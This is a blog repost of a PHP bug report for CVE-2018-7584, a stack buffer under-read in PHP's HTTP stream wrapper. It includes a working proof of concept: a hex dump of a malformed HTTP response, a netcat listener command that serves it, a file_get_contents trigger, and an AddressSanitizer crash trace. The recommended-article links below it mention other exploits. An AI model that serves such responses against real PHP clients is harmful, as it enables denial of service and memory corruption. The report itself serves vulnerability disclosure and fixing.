php stream_get_contents拒绝服务漏洞,CVE-2018-7584

最新推荐文章于 2022-04-01 13:53:59 发布
最新推荐文章于 2022-04-01 13:53:59 发布
阅读量521 收藏
点赞数
文章标签: php stream_get_contents拒绝服务漏洞

Description:

------------

The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:

php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723

if (tmp_line[tmp_line_len - 1] == '\n') {

--tmp_line_len;

if (tmp_line[tmp_line_len - 1] == '\r') {

--tmp_line_len;

}

}

If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.

$ bin/php --version

PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )

Copyright (c) 1997-2018 The PHP Group

Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies

Test script:

---------------

$ xxd -g 1 poc

0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..

$ nc -vvlp 8080 < poc

Listening on [0.0.0.0] (family 0, port 8080)

Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)

GET / HTTP/1.0

Host: localhost:8080

Connection: close

$ bin/php -r 'file_get_contents("http://localhost:8080");'

Expected result:

----------------

NO CRASH

Actual result:

--------------

$ bin/php -r 'file_get_contents("http://localhost:8080");'

=================================================================

==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac

READ of size 1 at 0xbfc038ef thread T0

#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723

#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979

#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027

#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550

#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224

#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573

#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731

#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760

#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082

#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123

#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134

#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042

#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404

#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)

#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)

Address 0xbfc038ef is located at offset 607 in frame of T0's stack:

This frame has 13 object(s):

[32, 36) 'transport_string'

[96, 100) 'errstr'

[160, 164) 'http_header_line_length'

[224, 232) 'timeout'

[288, 296) 'req_buf'

[352, 360) 'tmpstr'

[416, 432) 'ssl_proxy_peer_name'

[480, 496) 'http_header'

[544, 576) 'buf'

[608, 736) 'tmp_line'

[768, 1792) 'location'

[1824, 2848) 'new_path'

[2880, 3904) 'loc_path'

HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext

(longjmp and C++ exceptions *are* supported)

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex

Shadow bytes around the buggy address:

0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4

0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4

0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4

0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00

=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00

0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2

0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Shadow byte legend (one shadow byte represents 8 application bytes):

Addressable: 00

Partially addressable: 01 02 03 04 05 06 07

Heap left redzone: fa

Heap righ redzone: fb

Freed Heap region: fd

Stack left redzone: f1

Stack mid redzone: f2

Stack right redzone: f3

Stack partial redzone: f4

Stack after return: f5

Stack use after scope: f8

Global redzone: f9

Global init order: f6

Poisoned by user: f7

ASan internal: fe

==26249== ABORTING

Aborted

weixin_39875832
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php5.4.x缓冲区溢出,CVE-2018-7584
weixin_33181159的博客
03-11 742
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中的ext/standard/http_fopen_wrapper.c文件的‘php_stream_url_wrap_http_ex’函数存在栈缓冲区溢出漏洞。攻击者可利用该漏洞...
php stream_get_contents拒绝服务漏洞,ThinkPHP 5.x 远程代码getshell漏洞实战分析
weixin_34078749的博客
03-24 242
ThinkPHP 简介ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架漏洞解析漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试请求路由=> http://127.0.0.1/public/index.php?s=/index/\think\ap...
php ssh2远程登录防火墙报错PHP Warning: stream_get_contents(): Failure ‘transport read‘ (-43)
jxyk2007的专栏
04-01 1159
问题:原因防火墙策略未设置好 【原创】php ssh2 远程秘钥登录华三防火墙F5030_三块钱0794的博客-CSDN博客1.客户端生产秘钥文件[root@model /]# ssh-keygen -t rsa -P '' Generating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): Created directory '/root/.ssh'.Your ident.
命令执行漏洞学习
weixin_47306547的博客
09-14 2155
目录 命令执行漏洞简介 命令执行漏洞成因 命令执行漏洞危害 PHP中可以调用外部程序常见函数 1)system() 2) passthru() 3) exec() 4)shell_exec() 5)执行运算符(反引号 `) 6)popen() 7) proc_open() 命令执行漏洞简介 应用程序有时需要调用一些执行系统命令的函数,如在php中,使用system、exec、shell_exec\passthru、popen、proc_popen等函数可以执行系统命令。当黑客.
Buffer-Overflows:缓冲区溢出漏洞利用介绍
06-18
缓冲区溢出简介 作为我大学计算机安全课程的第一个项目,我的任务是在三个不同的简单程序上查找和利用缓冲区溢出漏洞。 先决条件 在深入研究缓冲区溢出之前,您应该熟悉: 基本的 C/C++ 理解。 Linux 权限。 基本装配知识。 GDB 和程序内存分配(堆栈、帧)。 GNU 项目调试器(又名 GDB)特别有用,因为我不会详细介绍如何使用它,如果您不熟悉,请查看文档或任何好的教程。 对本项目有用的部分有:反汇编程序,检查变量内容,打印saved return address等帧信息。 现在您可以开始阅读有关缓冲区溢出的。 场景 同一台 Linux 机器上还有其他三个用户,因此 /home 目录如下所示: jason@linux /home $ ls hyperuser jason masteruser superuser 每个用户(超级用户、超级用户、主用户)在他们的主目录中都
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
3. CVE-2018-15919:这是一个输入验证错误,可能导致拒绝服务(DoS)攻击。当OpenSSH处理特殊构造的请求时,可能会耗尽系统资源,导致服务不可用。 为了修复这些漏洞,我们需要将OpenSSH升级到最新的稳定版本。在这...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
Python——for,while循环
zy010101博客
03-08 466
循环是程序设计语言中非常重要的语法。有了循环,我们就能处理重复事件。下面的代码说明了for循环的基本流程。 num_list = [5,2,4,7,3,6,8,1,9,0] num_list.sort() for num in num_list: # 每次循环,num都会获得num_list中的下一个元素,直到遍历完num_list为止。 print(num) # 循环执行print(num)来进行打印 程序执行结果如下所示: 注意到for循环之后有个冒号,..
AppWeb认证绕过漏洞cve-2018-8715
WOJIAOChenshiyi的博客
08-02 743
title: AppWeb认证绕过漏洞cve-2018-8715 tags: 漏洞 AppWeb认证绕过漏洞 cve-2018-8715 Appweb介绍: Appweb是最快的嵌入式Web服务器,用于安全地托管物联网的嵌入式Web管理应用程序。凭借HTTP/2支持,它速度极快,具有广泛的安全控制,沙盒和防御性对策。 以上介绍来自官网,个人总结下它是一个web框架,我们在日常中的一些路由器...
CVE-2018-2894)Weblogic任意文件上传漏洞复现
xj28555的博客
08-24 1063
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。 复现过程1: 1、...
php stream_get_contents,php file_get_contents() 函数
weixin_35851553的博客
03-17 340
file_get_contents()(PHP 4 >= 4.3.0, PHP 5, PHP 7)file_get_contents — 将整个文件读入一个字符串说明file_get_contents ( string $filename [, bool $use_include_path = false [, resource $context [, int $offset = -1 [,...
完美解决failed to open stream: HTTP request failed!(file_get_contents引起的)
weixin_34055910的博客
05-17 2883
当使用php5自带的file_get_contents方法来获取远程文件的时候,有时候会出现file_get_contents(): failed to open stream: HTTP request failed!这个警告信息。google或者baidu一下,好多这样的问题,解决的方法都是修改PHP.ini,把allow_url_fopen给启用,改成 allow_ur...
PHP源码分析-流的实现之普通http流的处理
a_lzq的博客
07-28 373
PHP-流的实现之普通http协议的解析 前一章处理说完标输入流的处理,这章看下php是如何针对普通的http网络流建立连接的. php_register_url_stream_wrapper("http", &php_stream_http_wrapper); 类似上一章的方法搜索 //首先是 PHPAPI const php_stream_wrapper php_stream_http_wrapper = { &http_stream_wops, NULL, 1 /* is_ur
CVE-2018-8120 Microsoft Windows提权漏洞 Exp
weixin_34290000的博客
05-20 602
CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 x64. Usage CVE-2018-8120 exploit Usage:...
Weblogic CVE-2018-2894 漏洞复现
07-23 7985
0x01 前言   Oracle官方发布了7月份的关键补丁更新CPU(Critical Patch Update),其中针对可造成远程代码执行的高危漏洞 CVE-2018-2894 进行修复:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html 0x02 环境搭建 1、首先到Oracle官网下载...
PHP 输入验证漏洞 CVE-2018-10547
最新发布
10-24
根据提供的引用内容,我没有找到与“PHP 输入验证漏洞 CVE-2018-10547”相关的信息。但是,我可以为您提供有关PHP漏洞的一些信息。 引用提到了PHP 7.1.x版本中的imap_mail函数null指针取消引用的漏洞,这是一个安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值